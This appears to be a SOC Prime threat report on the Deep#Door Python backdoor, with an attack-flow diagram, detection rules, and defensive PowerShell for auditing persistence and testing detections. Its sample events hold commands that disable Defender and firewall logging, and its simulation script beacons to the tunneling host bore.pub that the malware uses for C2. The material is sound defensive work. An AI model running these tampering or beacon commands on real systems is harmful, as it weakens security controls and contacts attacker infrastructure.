SOC Prime Bias: Critical

04 May 2026 20:21

Deep#Door Stealer: Stealthy Python Backdoor and Credential Stealer Leveraging Tunneling, Multi-Layer Persistence, and In-Memory Surveillance Capabilities

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The report examines Deep#Door, a stealthy Python-based backdoor delivered through an obfuscated batch loader that embeds and reconstructs its malicious payload at runtime. The malware uses a public TCP tunneling service for command-and-control, sets up several persistence mechanisms, weakens Windows security controls, and supports broad surveillance and credential-theft activity. It also performs detailed environment checks to evade sandboxes and analysts, while relying on in-memory API patching to stay concealed during execution.

Investigation

Securonix researchers mapped the full infection chain from the initial batch script to payload extraction, reconstruction, and execution of the final Python RAT. Their analysis identified abuse of bore.pub for tunneling, dynamically generated ports, and a custom authentication sequence used for operator access. The report also detailed the malware’s defense-evasion methods, persistence techniques, system discovery routines, and data exfiltration behavior.

Mitigation

Defenders should closely monitor script execution (batch, PowerShell, VBScript and Python interpreters launched from user-writable paths), enable PowerShell script block and module logging, alert on changes to Microsoft Defender preferences and firewall logging, and audit startup entries, Run keys, scheduled tasks and WMI event subscriptions. Network monitoring should focus on outbound connections to bore.pub and on unusual outbound high-port activity (the 41234-41243 range used in the simulation below). EDR tooling that can detect API patching and other in-memory tampering further improves visibility into this threat.

Response

If Deep#Door activity is detected, isolate the affected endpoint immediately, terminate the malicious Python process, remove every persistence mechanism (the Startup-folder VBS script, Run key, scheduled task and any WMI subscriptions), and restore the Defender, firewall and logging settings the malware modified. Security teams should also capture memory and perform forensic analysis to identify hidden implants and assess credential-theft exposure, rotate any credentials, keys or tokens the stealer could have reached, and block network communication to bore.pub.
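As an added example (written for this page, not code from the Securonix report or a SOC Prime rule), the following PowerShell script audits the persistence locations and security-control settings the Mitigation and Response sections refer to, and provides a function that restores the Defender, firewall and script block logging baseline. The artifact names it looks for (SystemServices.vbs, svc.py, install_obf.bat, the per-user Startup folder) are taken from the attack flow on this page; the interpreter pattern and the policy registry path for script block logging are standard Windows locations, and Restore-SecurityBaseline assumes Defender tamper protection does not block the Set-MpPreference call. Run it from an elevated shell.

```powershell
# Added example: audit Deep#Door-style persistence and security-control tampering.
# Artifact names below come from the attack flow on this page; paths are standard Windows locations.
$SuspectNames  = @('SystemServices.vbs', 'svc.py', 'install_obf.bat')
$SuspectNameRx = ($SuspectNames | ForEach-Object { [regex]::Escape($_) }) -join '|'
$SuspectHosts  = 'wscript|cscript|python|powershell'   # interpreters used along the loader chain

function Get-DeepDoorPersistence {
    $findings = New-Object System.Collections.Generic.List[object]
    function Add-Finding($Source, $Detail) {
        $findings.Add([pscustomobject]@{ Source = $Source; Detail = $Detail })
    }

    # 1. Run / RunOnce keys in both hives (T1547.001)
    $runKeys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
               'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
               'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
               'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($name in ($props.PSObject.Properties | Where-Object { $_.Name -notmatch '^PS' }).Name) {
            $value = [string]$props.$name
            if ($value -match $SuspectHosts -or $value -match $SuspectNameRx) {
                Add-Finding "$key\$name" $value
            }
        }
    }

    # 2. Per-user Startup folder (the report drops SystemServices.vbs here)
    $startup = Join-Path $env:APPDATA 'Microsoft\Windows\Start Menu\Programs\Startup'
    Get-ChildItem -Path $startup -File -ErrorAction SilentlyContinue |
        Where-Object { $_.Extension -match '^\.(vbs|bat|cmd|ps1|py|lnk)$' } |
        ForEach-Object { Add-Finding 'StartupFolder' $_.FullName }

    # 3. Scheduled tasks whose action runs a script interpreter (T1053 fallback persistence)
    Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
        foreach ($a in $_.Actions) {
            $cmd = "$($a.Execute) $($a.Arguments)"
            if ($cmd -match $SuspectHosts) { Add-Finding "ScheduledTask:$($_.TaskPath)$($_.TaskName)" $cmd }
        }
    }

    # 4. WMI permanent event subscriptions (filter -> consumer bindings and command-line consumers)
    Get-CimInstance -Namespace root\subscription -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue |
        ForEach-Object { Add-Finding 'WMI:__FilterToConsumerBinding' "$($_.Filter) -> $($_.Consumer)" }
    Get-CimInstance -Namespace root\subscription -ClassName CommandLineEventConsumer -ErrorAction SilentlyContinue |
        ForEach-Object { Add-Finding "WMI:CommandLineEventConsumer:$($_.Name)" $_.CommandLineTemplate }

    return $findings
}

function Get-SecurityControlTampering {
    # Defender preferences the loader flips with Set-MpPreference, plus exclusions it may add
    $mp = Get-MpPreference
    $state = [ordered]@{
        DisableRealtimeMonitoring = $mp.DisableRealtimeMonitoring
        DisableBehaviorMonitoring = $mp.DisableBehaviorMonitoring
        DisableIOAVProtection     = $mp.DisableIOAVProtection
        ExclusionPath             = ($mp.ExclusionPath -join ';')
    }
    # Script block logging is a policy value; a missing key or 0 means it is off
    $sbl = Get-ItemProperty 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' -ErrorAction SilentlyContinue
    $state['ScriptBlockLoggingEnabled'] = [bool]($sbl.EnableScriptBlockLogging -eq 1)
    $fw = Get-NetFirewallProfile | Select-Object Name, Enabled, LogAllowed, LogBlocked
    [pscustomobject]@{ Defender = [pscustomobject]$state; Firewall = $fw }
}

function Restore-SecurityBaseline {
    # Reverses the Set-MpPreference / netsh changes from the attack flow and re-enables script block logging
    Set-MpPreference -DisableRealtimeMonitoring $false -DisableBehaviorMonitoring $false -DisableIOAVProtection $false
    Set-NetFirewallProfile -All -Enabled True -LogBlocked True
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord
}

Get-DeepDoorPersistence | Format-Table -AutoSize
Get-SecurityControlTampering | Format-List
```

The audit deliberately over-reports: any Run key or task that invokes python, wscript or powershell is listed, because the point during triage is to see every candidate and compare against a known-good baseline, not to decide automatically. Call Restore-SecurityBaseline only after the malicious process has been stopped and persistence removed, otherwise the loader simply disables the controls again on its next run.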

Attack Flow

    graph TB
        %% Class definitions
        classDef action fill:#99ccff
        classDef tool fill:#ffcc99
        classDef malware fill:#ff9999
        classDef process fill:#ccccff

        %% Node definitions
        action_user_execution["<b>Action</b> – <b>T1204 User Execution</b>: Victim runs malicious batch file install_obf.bat"]
        class action_user_execution action
        tool_batch_file["<b>Tool</b> – <b>Name</b>: install_obf.bat<br/><b>Description</b>: Batch script that launches the loader"]
        class tool_batch_file tool
        action_obfuscation["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b>: Extracts base64/XOR encoded Python payload (svc.py) via self-referencing PowerShell regex"]
        class action_obfuscation action
        tool_powershell["<b>Tool</b> – <b>Name</b>: PowerShell<br/><b>Description</b>: Used to parse the batch file and decode the embedded payload"]
        class tool_powershell tool
        tool_python["<b>Tool</b> – <b>Name</b>: Python<br/><b>Description</b>: Executes the decoded svc.py payload"]
        class tool_python tool
        action_defense_evasion_disable["<b>Action</b> – <b>T1562.001 Disable or Modify Tools</b> / <b>T1562.004 Disable or Modify System Firewall</b> / <b>T1562.002 Disable Windows Event Logging</b>: Disables Windows Defender, PowerShell logging, SmartScreen and firewall logging"]
        class action_defense_evasion_disable action
        tool_setmp["<b>Tool</b> – <b>Name</b>: Set-MpPreference<br/><b>Description</b>: PowerShell cmdlet used to change Defender settings"]
        class tool_setmp tool
        tool_netsh["<b>Tool</b> – <b>Name</b>: netsh advfirewall<br/><b>Description</b>: Modifies Windows firewall rules and logging"]
        class tool_netsh tool
        action_indicator_removal["<b>Action</b> – <b>T1070.001 Clear Windows Event Logs</b> and <b>T1070.006 Timestomp</b>: Stops and clears EventLog/Sysmon services and alters file timestamps"]
        class action_indicator_removal action
        action_persistence_runkey["<b>Action</b> – <b>T1547.001 Registry Run Keys/Startup Folder</b> and <b>T1053 Scheduled Task/Job</b>: Drops SystemServices.vbs to Startup folder, creates Run key and a scheduled task as fallback"]
        class action_persistence_runkey action
        tool_vbs_startup["<b>Tool</b> – <b>Name</b>: SystemServices.vbs<br/><b>Description</b>: VBS script placed in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"]
        class tool_vbs_startup tool
        action_credential_access["<b>Action</b> – <b>T1003 OS Credential Dumping</b>, <b>T1552.004 Private Keys</b>, <b>T1552.001 Credentials In Files</b>, <b>T1555 Password Stores</b>, <b>T1555.005 Password Managers</b>: Harvests browser passwords, Windows Credential Manager, SSH keys, cloud tokens"]
        class action_credential_access action
        action_collection["<b>Action</b> – <b>T1056.001 Keylogging</b>, <b>T1113 Screen Capture</b>, <b>T1125 Video Capture</b>, <b>T1123 Audio Capture</b>, <b>T1115 Clipboard Data</b>: Captures keystrokes, screenshots, webcam video, microphone audio and clipboard"]
        class action_collection action
        action_discovery["<b>Action</b> – <b>T1082 System Information Discovery</b>, <b>T1518 Software Discovery</b>, <b>T1057 Process Discovery</b>, <b>T1046 Network Service Discovery</b>, <b>T1018 Remote System Discovery</b>, <b>T1526 Cloud Service Discovery</b>: Gathers OS, hardware, software, process, network and cloud configuration data"]
        class action_discovery action
        action_defense_evasion_reflective["<b>Action</b> – <b>T1620 Reflective Code Loading</b> and <b>T1497.001 Virtualization/Sandbox Evasion: System Checks</b>: Detects debuggers, virtual machines and sandbox characteristics and aborts execution; patches APIs in memory to stay concealed"]
        class action_defense_evasion_reflective action
        action_c2_tunneling["<b>Action</b> – <b>T1572 Protocol Tunneling</b>: Establishes encrypted tunnel via public service bore.pub, performs dynamic port scanning and challenge-response authentication"]
        class action_c2_tunneling action
        action_exfiltration["<b>Action</b> – <b>T1041 Exfiltration Over C2 Channel</b> and <b>T1048.002 Exfiltration Over Alternative Protocol: Asymmetric Encrypted Non-C2</b>: Sends harvested data through the tunneled channel"]
        class action_exfiltration action
        action_impact_forkbomb["<b>Action</b> – <b>T1499 Endpoint Denial of Service</b>: Executes a fork bomb to consume system resources"]
        class action_impact_forkbomb action

        %% Connections showing attack flow
        action_user_execution -->|executes| tool_batch_file
        tool_batch_file -->|contains| action_obfuscation
        action_obfuscation -->|uses| tool_powershell
        tool_powershell -->|decodes and launches| tool_python
        tool_python -->|performs| action_defense_evasion_disable
        action_defense_evasion_disable -->|uses| tool_setmp
        action_defense_evasion_disable -->|uses| tool_netsh
        action_defense_evasion_disable -->|leads to| action_indicator_removal
        action_indicator_removal -->|precedes| action_persistence_runkey
        action_persistence_runkey -->|drops| tool_vbs_startup
        action_persistence_runkey -->|enables| action_credential_access
        action_credential_access -->|enables| action_collection
        action_collection -->|feeds data to| action_discovery
        action_discovery -->|supports| action_defense_evasion_reflective
        action_defense_evasion_reflective -->|establishes| action_c2_tunneling
        action_c2_tunneling -->|carries| action_exfiltration
        action_exfiltration -->|triggers| action_impact_forkbomb

Detections

Rules by SOC Prime Team (01 May 2026):

  • Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
  • Suspicious Powershell Strings (via cmdline)
  • Call Suspicious .NET Classes/Methods from Powershell CommandLine (via process_creation)
  • Possible Remote System Discovery or Connectivity Check (via cmdline)
  • Possible Account or Group Enumeration / Manipulation (via cmdline)
  • Possible Timeout Usage for Delay Execution (via cmdline)
  • LOLBAS WScript / CScript (via process_creation)
  • Disable Windows Defender Realtime Monitoring and Other Preferences Changes (via cmdline)
  • Suspicious Powershell Strings (via powershell)
  • Windows Defender Preferences Suspicious Changes (via powershell)
  • Suspicious Binary / Scripts in Autostart Location (via file_event)

Rules by SOC Prime AI Rules (01 May 2026):

  • IOCs (HashSha256) to detect: Deep#Door Stealer: Stealthy Python Backdoor and Credential Stealer Leveraging Tunneling, Multi-Layer Persistence, and In-Memory Surveillance Capabilities
  • Detect C2 Communication via Public TCP Tunneling Service [Windows Network Connection]
  • PowerShell Command for Embedded Python Payload Extraction [Windows Powershell]
  • Detection of Deep#Door Stealthy Python Backdoor Deployment [Windows Process Creation]
  • Detection of Bore.pub TCP Tunneling Service Usage for C2 Communications [Windows Network Connection]
  • Windows Defender Real-Time and Behavior Monitoring Disabled [Windows Powershell]
  • Deep#Door Obfuscated Batch Script Execution [Windows Process Creation]
  • PowerShell Command Disabling Windows Defender Features [Windows Powershell]
  • Detection of Deep#Door Stealthy Python Backdoor Execution [Windows Process Creation]
  • Detection of Stealth C2 Communication via bore.pub [Windows Network Connection]
  • Deep#Door Stealer Detection Using PowerShell and Firewall Tampering [Windows Powershell]
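To make the intent of the rules above concrete, here is an added PowerShell example (not SOC Prime's rule logic, which lives in the rules themselves) that runs simplified versions of several of them over constructed Sysmon-style events. The events, the victim's paths and the Python install path are made up for the illustration; field names follow Sysmon event IDs 1 (process creation), 3 (network connection) and 11 (file create), and the 41234-41243 port range is the one the simulation section cites.

```powershell
# Added example: simplified Deep#Door detection logic over constructed Sysmon-style events.
# Sample events are made up; field names follow Sysmon EID 1 / 3 / 11.
$Events = @(
    [pscustomobject]@{ Id=1; Image='C:\Windows\System32\cmd.exe'; ParentImage='C:\Windows\explorer.exe';
        CommandLine='cmd.exe /c C:\Users\victim\Downloads\install_obf.bat' }
    [pscustomobject]@{ Id=1; Image='C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage='C:\Windows\System32\cmd.exe';
        CommandLine='powershell -NoP -W Hidden -c "Set-MpPreference -DisableRealtimeMonitoring $true -DisableBehaviorMonitoring $true"' }
    [pscustomobject]@{ Id=1; Image='C:\Windows\System32\netsh.exe'; ParentImage='C:\Windows\System32\cmd.exe';
        CommandLine='netsh advfirewall set allprofiles logging droppedconnections disable' }
    [pscustomobject]@{ Id=11; Image='C:\Python312\python.exe';
        TargetFilename='C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemServices.vbs' }
    [pscustomobject]@{ Id=1; Image='C:\Windows\System32\wscript.exe'; ParentImage='C:\Windows\explorer.exe';
        CommandLine='wscript.exe "C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemServices.vbs"' }
    [pscustomobject]@{ Id=3; Image='C:\Python312\python.exe'; DestinationHostname='bore.pub'; DestinationPort=41237 }
    [pscustomobject]@{ Id=3; Image='C:\Program Files\Mozilla Firefox\firefox.exe'; DestinationHostname='example.org'; DestinationPort=443 }
)

function Test-DeepDoorEvents {
    param([object[]]$Events)
    $alerts = New-Object System.Collections.Generic.List[object]
    foreach ($e in $Events) {
        $hits = @()
        switch ($e.Id) {
            1 {
                # Defender preference tampering via Set-MpPreference (-match is case-insensitive)
                if ($e.CommandLine -match 'Set-MpPreference.*-Disable(RealtimeMonitoring|BehaviorMonitoring|IOAVProtection)\s+\$?true') {
                    $hits += 'Windows Defender Preferences Suspicious Changes'
                }
                # netsh turning off firewall logging or the firewall itself
                if ($e.CommandLine -match 'netsh\s+advfirewall\s+set\s+.*(logging|state\s+off)') {
                    $hits += 'Firewall Tampering'
                }
                # wscript/cscript executing a script out of the Startup folder
                if ($e.Image -match '\\[wc]script\.exe$' -and $e.CommandLine -match '\\Startup\\') {
                    $hits += 'LOLBAS WScript / CScript launched from Startup'
                }
                # batch file double-clicked by the user (explorer.exe parent)
                if ($e.CommandLine -match '\.bat"?\s*$' -and $e.ParentImage -match '\\explorer\.exe$') {
                    $hits += 'Obfuscated Batch Script Execution (user launched)'
                }
            }
            11 {
                if ($e.TargetFilename -match '\\Start Menu\\Programs\\Startup\\[^\\]+\.(vbs|bat|cmd|ps1|py)$') {
                    $hits += 'Suspicious Binary / Scripts in Autostart Location'
                }
            }
            3 {
                # Hostname match is the strong signal; the bare port range alone is noisy and should
                # be combined with a process or destination baseline in a real rule
                if ($e.DestinationHostname -match '(^|\.)bore\.pub$' -or
                    ($e.DestinationPort -ge 41234 -and $e.DestinationPort -le 41243)) {
                    $hits += 'C2 Communication via Public TCP Tunneling Service'
                }
            }
        }
        foreach ($h in $hits) {
            $alerts.Add([pscustomobject]@{ Rule = $h; EventId = $e.Id; Image = $e.Image })
        }
    }
    return $alerts
}

Test-DeepDoorEvents -Events $Events | Format-Table -AutoSize
```

Run against the constructed events, six of the seven produce an alert and the Firefox connection to port 443 produces none. The network check is the one to tune: matching only on the port range will flag legitimate ephemeral-port traffic, so production logic should pair it with the resolved hostname or the originating process (a Python interpreter talking to a tunneling service is far more specific than a high port on its own).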

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    An attacker who has gained a low-privilege foothold on the Windows host wants to establish a stealthy C2 channel over the public bore.pub tunneling service that Deep#Door abuses. The attacker picks a port from the 41234-41243 range the malware uses and opens a raw TCP connection with PowerShell's System.Net.Sockets.TcpClient class, sends a small base64-encoded beacon, then holds the connection open briefly to mimic a heartbeat. Note that the script really does reach out to a public host: run it only from a lab network where that is acceptable, or resolve bore.pub to an internal listener (for example through the hosts file) so the network_connection telemetry is still produced without leaving the lab.

  • Regression Test Script:

    # Simulate Deep#Door C2 beacon to bore.pub on a random port within the monitored range
    $domain = 'bore.pub'
    $port   = Get-Random -Minimum 41234 -Maximum 41244   # Upper bound is exclusive
    $client = $null
    $stream = $null
    try {
        # ${domain} is required here: "$domain:$port" is parsed as a drive-qualified variable
        Write-Host "Connecting to ${domain}:${port} ..."
        $client = New-Object System.Net.Sockets.TcpClient
        # Bound the connect attempt so a filtered port does not hang the test run
        if (-not $client.ConnectAsync($domain, $port).Wait(5000)) {
            throw "Connect to ${domain}:${port} timed out"
        }
        $stream = $client.GetStream()

        # Minimal beacon payload: base64-encoded "ping" ('cGluZw==')
        $payload = [System.Text.Encoding]::ASCII.GetBytes('cGluZw==')
        $stream.Write($payload, 0, $payload.Length)
        Write-Host "Beacon sent. Holding connection for 5 seconds..."
        Start-Sleep -Seconds 5
    }
    catch {
        Write-Error "Connection failed: $_"
    }
    finally {
        if ($stream) { $stream.Close() }
        if ($client) { $client.Close() }
        Write-Host "Connection closed."
    }
  • Cleanup Commands:

    # No persistent artifacts; the finally block already closed the socket, this only confirms nothing lingers.
    # -RemotePort takes an array of ports, not a "41234-41243" range string.
    Get-NetTCPConnection -RemotePort (41234..41243) -State Established -ErrorAction SilentlyContinue |
        Where-Object { $_.OwningProcess -ne $PID } |   # never kill the shell running this test
        ForEach-Object { Stop-Process -Id $_.OwningProcess -Force }
    Write-Host "Cleanup complete."

End of Report